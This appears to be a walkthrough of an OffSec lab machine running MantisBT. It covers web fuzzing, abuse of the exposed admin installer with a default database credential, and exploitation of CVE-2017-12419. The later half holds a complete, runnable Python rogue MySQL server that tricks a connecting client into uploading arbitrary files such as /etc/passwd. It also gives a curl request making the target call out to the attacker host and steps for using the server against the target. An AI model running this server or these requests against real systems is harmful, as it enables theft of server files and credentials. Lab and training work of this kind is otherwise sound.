Web
Nmap discovered a web server on the target's TCP port 80.
The running service is Apache/2.4.41 (Ubuntu), as the Server header below confirms.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2025 17:18:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: text/html
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2025 17:18:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 08 Apr 2019 14:38:27 GMT
ETag: "de09-58605ca16bec0"
Accept-Ranges: bytes
Content-Length: 56841
Vary: Accept-Encoding
Content-Type: text/html
Webroot
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php -fc 403
________________________________________________
:: Method : GET
:: URL : http://192.168.135.204/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
bugtracker [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 22ms]
css [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 25ms]
fonts [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 24ms]
img [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 28ms]
index.html [Status: 200, Size: 56841, Words: 21929, Lines: 1342, Duration: 23ms]
js [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 20ms]
license.txt [Status: 200, Size: 548, Words: 73, Lines: 13, Duration: 22ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1459 req/sec :: Duration: [0:00:57] :: Errors: 40 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.135.204/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 56841, Words: 21929, Lines: 1342, Duration: 28ms]
img [Status: 200, Size: 3100, Words: 183, Lines: 28, Duration: 35ms]
icons [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 37ms]
css [Status: 200, Size: 2791, Words: 149, Lines: 26, Duration: 20ms]
js [Status: 200, Size: 2860, Words: 179, Lines: 26, Duration: 21ms]
fonts [Status: 200, Size: 1571, Words: 97, Lines: 20, Duration: 45ms]
bugtracker [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 318ms]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 18ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1612 req/sec :: Duration: [0:02:06] :: Errors: 0 ::
bugtracker
/bugtracker
Redirected to a Mantis Bug Tracker login page at /bugtracker/login_page.php
There is a warning that the admin directory should be removed or restricted.
Mantis Bug Tracker is a free and open source, web-based bug tracking system. The most common use of MantisBT is to track software defects. However, MantisBT is often configured by users to serve as a more generic issue tracking system and project management tool.
MantisBT is open source, so its source code is available for review.
The default MantisBT login (administrator / root) does not work.
Registration
Registration requires account activation (a confirmation e-mail), so self-registration is not a usable path here.
Admin Directory
The login page warns that the admin directory is still present and should be removed or restricted.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/bugtracker/admin/FUZZ -ic -e .html,.txt,.php -fc 403
________________________________________________
:: Method : GET
:: URL : http://192.168.135.204/bugtracker/admin/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
check [Status: 301, Size: 335, Words: 20, Lines: 10, Duration: 18ms]
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
install.php [Status: 200, Size: 8749, Words: 464, Lines: 186, Duration: 26ms]
schema.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 22ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1801 req/sec :: Duration: [0:00:50] :: Errors: 0 ::
Fuzzing the /admin directory reveals interesting endpoints.
/admin/check
The /admin/check endpoint checks the current MantisBT installation by running a series of PHP test scripts.
It leaks the web root directory: /var/www/html/bugtracker
/admin/install.php
While the /admin/install.php endpoint runs the pre-installation checks, it also exposes an Upgrade Options section that lets an unauthenticated visitor re-run the installer with database settings supplied in the request.
Default Credential
The default database credential, root with an empty password, was accepted by the installer.
- The installation process recommends setting up the database
- It also updated the configuration file config/config_inc.php
- The installation appears to have completed; there is a button to log in
Note that re-running the installer rewrites the live config/config_inc.php, which is a destructive action on a real engagement.
Failed Login
Attempting to log in to MantisBT as root with a blank password failed.
That is the database credential, after all, not a MantisBT account.
Vulnerabilities
The installed version has not been identified. There is a public unauthenticated RCE exploit for MantisBT 2.3.0; the project's latest release is 2.27.1, so the target could be anywhere in that range, but the exploit is cheap to try.
It did not work.
Vulnerabilities in /admin/install.php
Given the extensive capability of the /admin/install.php file described above, it is worth looking into it for vulnerabilities.
Searching turns up an article about an arbitrary file read vulnerability, CVE-2017-12419.
The article explains that the arbitrary file read is achievable through admin/install.php because it supports installing the database remotely: with install=3 the script connects to the MySQL server named in the hostname parameter, and a malicious server can answer with a LOAD DATA LOCAL INFILE request that makes the client send back any file the web server's user can read.
Testing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -s "http://$IP/bugtracker/admin/install.php?install=3&hostname=192.168.45.157"
Sending the test request, with hostname pointing at the attacking host (192.168.45.157).
Confirmed. The target reaches out to the supplied hostname; a listener on TCP 3306 on the attacking host (for example nc -lvnp 3306) is the simplest way to observe the connection.
The target MantisBT is likely vulnerable to CVE-2017-12419.
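The server side of that attack, as an added example (not code from this page, from the CVE article, or from MantisBT): a minimal rogue MySQL server that completes the handshake with whatever credentials the client offers, waits for its first query, and replies with a LOAD DATA LOCAL INFILE request for a file of the attacker's choosing. The packet layouts follow the MySQL client/server protocol; constructed_client, victim_fs and run_demo are constructed stand-ins so the exchange can be run offline against itself, and the salt, server version string and "SET NAMES utf8" query are arbitrary values chosen for the example.

```python
"""Rogue MySQL server: answers a client's first query with a LOAD DATA LOCAL INFILE
request, so a local-infile-enabled client uploads the named file (CVE-2017-12419
technique; added example, not MantisBT code)."""
import socket
import struct
import threading

# Advertised capabilities (MySQL protocol names): CLIENT_LONG_PASSWORD, CLIENT_LONG_FLAG,
# CLIENT_CONNECT_WITH_DB, CLIENT_LOCAL_FILES, CLIENT_PROTOCOL_41, CLIENT_SECURE_CONNECTION,
# CLIENT_PLUGIN_AUTH
CAPS = 0x1 | 0x4 | 0x8 | 0x80 | 0x200 | 0x8000 | 0x80000
COM_QUERY, LOCAL_INFILE = 0x03, 0xFB  # 0xFB response header: "send me this local file"

def packet(seq, payload):
    """Frame a payload: 3-byte little-endian length, then a 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def read_packet(sock):
    """Return (sequence id, payload) of the next packet on the socket."""
    hdr = recv_exact(sock, 4)
    return hdr[3], recv_exact(sock, hdr[0] | (hdr[1] << 8) | (hdr[2] << 16))

def handshake_v10():
    """Initial Handshake packet (protocol 10) with a fixed 20-byte salt."""
    salt = b"A" * 20
    return (b"\x0a" + b"5.7.0-rogue\x00" + struct.pack("<I", 1) + salt[:8]
            + b"\x00" + struct.pack("<H", CAPS & 0xFFFF) + b"\x21"
            + struct.pack("<H", 0x0002) + struct.pack("<H", CAPS >> 16)
            + bytes([len(salt) + 1]) + b"\x00" * 10 + salt[8:] + b"\x00"
            + b"mysql_native_password\x00")

def ok_packet():
    """OK packet: 0x00, 0 affected rows, 0 insert id, AUTOCOMMIT status, 0 warnings."""
    return b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0)

def rogue_session(conn, target_path):
    """Serve one client and return the bytes it uploaded: None if it never sent a
    query, b"" if it answered with an empty packet (local-infile disabled, or the
    file is unreadable by the web server's user)."""
    conn.sendall(packet(0, handshake_v10()))
    seq, _login = read_packet(conn)  # HandshakeResponse41: any credentials accepted
    conn.sendall(packet(seq + 1, ok_packet()))
    seq, cmd = read_packet(conn)     # first command after login
    if not cmd or cmd[0] != COM_QUERY:
        return None
    conn.sendall(packet(seq + 1, bytes([LOCAL_INFILE]) + target_path.encode()))
    data = b""
    while True:                      # file arrives in packets; an empty one ends it
        seq, chunk = read_packet(conn)
        if not chunk:
            break
        data += chunk
    conn.sendall(packet(seq + 1, ok_packet()))
    return data

def serve_once(listening_sock, target_path):
    """Accept one client on a listening socket and return what it uploaded."""
    conn, _peer = listening_sock.accept()
    with conn:
        return rogue_session(conn, target_path)

def constructed_client(addr, files):
    """Constructed stand-in for a local-infile-enabled MySQL client (offline demo);
    ``files`` maps path -> bytes and plays the victim filesystem. Against the real
    target this role is played by MantisBT's DB client, triggered via install.php."""
    with socket.create_connection(addr) as s:
        seq, _greeting = read_packet(s)
        # HandshakeResponse41: caps, max packet, charset, 23 reserved bytes, user,
        # length-encoded auth response (empty), auth plugin name
        s.sendall(packet(seq + 1, struct.pack("<IIB", CAPS, 0x01000000, 0x21)
                         + b"\x00" * 23 + b"root\x00\x00mysql_native_password\x00"))
        read_packet(s)  # OK
        s.sendall(packet(0, bytes([COM_QUERY]) + b"SET NAMES utf8"))
        seq, reply = read_packet(s)
        if reply and reply[0] == LOCAL_INFILE:
            content = files.get(reply[1:].decode(), b"")
            if content:
                seq += 1
                s.sendall(packet(seq, content))
            s.sendall(packet(seq + 1, b""))
            read_packet(s)  # final OK

def run_demo(target="/etc/passwd"):
    """Rogue server on a loopback port against the constructed client."""
    victim_fs = {"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"}  # constructed
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    result = []
    t = threading.Thread(target=lambda: result.append(serve_once(srv, target)))
    t.start()
    constructed_client(srv.getsockname(), victim_fs)
    t.join(5)
    srv.close()
    return result[0] if result else None

if __name__ == "__main__":
    print(run_demo().decode(), end="")
```

Against the lab target the constructed client is not needed: bind a socket on 0.0.0.0:3306 on the attacking host, call serve_once(sock, "/etc/passwd"), then send the same install.php request as in the Testing step with hostname set to that host. A return value of None means the client connected but never issued a query; b"" means it refused the upload, which is what happens when the PHP MySQL client has local-infile disabled (the mysqli.allow_local_infile setting), so an empty result is a configuration finding rather than a bug in the request.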